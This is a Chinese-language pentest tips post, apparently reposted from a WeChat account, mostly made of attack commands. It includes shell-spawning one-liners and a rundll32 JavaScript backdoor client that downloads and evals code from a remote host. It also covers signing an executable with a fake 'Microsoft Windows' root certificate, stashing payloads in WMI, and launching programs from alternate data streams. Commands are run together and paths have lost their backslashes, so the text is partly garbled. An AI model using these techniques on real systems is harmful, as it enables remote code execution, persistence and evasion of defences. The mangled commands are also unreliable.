1、不同方法生成反弹交互式shell
python -c 'import pty; pty.spawn("/bin/sh")'echo os.system('/bin/bash')/bin/sh -iperl —e 'exec "/bin/sh";'perl: exec "/bin/sh";ruby: exec "/bin/sh"lua: os.execute('/bin/sh')exec "/bin/sh"
2、判断蜜罐
通过shodan判断IP是否为蜜罐
https://honeyscore.shodan.io/
3、默认密码查询
路由器默认密码:
https://www.routerpasswords.com/
程序或者其他设备默认密码:
https://www.fortypoundhead.com/tools_dpw.asp
默认密码:https://default-password.info/
4、其他
以下来源:
https://github.com/3gstudent/Pentest-and-Development-Tips
本文只列举部分,详细内容请访问github
Tips 1. Windows系统证书生成与注册
证书生成与签名:
makecert -n "CN=Microsoft Windows" -r -sv Root.pvk Root.cercert2spc Root.cer Root.spcpvk2pfx -pvk Root.pvk -pi 12345678password -spc Root.spc -pfx Root.pfx -fsigntool sign /f Root.pfx /p 12345678password test.exe
执行后生成Root.cer、Root.pfx、Root.pvk、Root.spc四个文件,test.exe被加上数字签名
证书注册:
管理员权限cmd,将证书添加到localmachine:
certmgr.exe -add -c Root.cer -s -r localmachine rootTips 2. Windows下通过cmd调用rundll32执行一段代码弹回Shell
Server:
https://github.com/3gstudent/Javascript-Backdoor/blob/master/JSRat.ps1
Client:
rundll32.exe javascript:"..mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");w=new%20ActiveXObject("WScript.Shell");try{v=w.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Internet%20Settings\ProxyServer");q=v.split("=")[1].split(";")[0];h.SetProxy(2,q);}catch(e){}h.Open("GET","http://192.168.174.131/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}当然,该RAT工具还可通过以下方法加载:
vbs,js,exe,dll,shellcode
Tips 3. Windows系统中可供存储和读取payload的位置
方法1:WMI
存储:
$StaticClass = New-Object Management.ManagementClass('rootcimv2', $null,$null)$StaticClass.Name = 'Win32_Command'$StaticClass.Put()$StaticClass.Properties.Add('Command' , $Payload)$StaticClass.Put()
读取:
$Payload=([WmiClass] 'Win32_Command').Properties['Command'].Value方法2:包含数字签名的PE文件
利用文件hash的算法缺陷,向PE文件中隐藏Payload,同时不影响该PE文件的数字签名
参考:
https://3gstudent.github.io/3gstudent.github.io/%E9%9A%90%E5%86%99%E6%8A%80%E5%B7%A7-%E5%9C%A8PE%E6%96%87%E4%BB%B6%E7%9A%84%E6%95%B0%E5%AD%97%E8%AF%81%E4%B9%A6%E4%B8%AD%E9%9A%90%E8%97%8FPayload/
方法3:特殊ADS
(1)...
type putty.exe > ...:putty.exewmic process call create c:testads...:putty.exe
(2)特殊COM文件
type putty.exe > \.C:testadsCOM1:putty.exewmic process call create \.C:testadsCOM1:putty.exe
(3)磁盘根目录
type putty.exe >C::putty.exewmic process call create C::putty.exe
本文始发于微信公众号(关注安全技术):渗透Tips - 第二十期
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论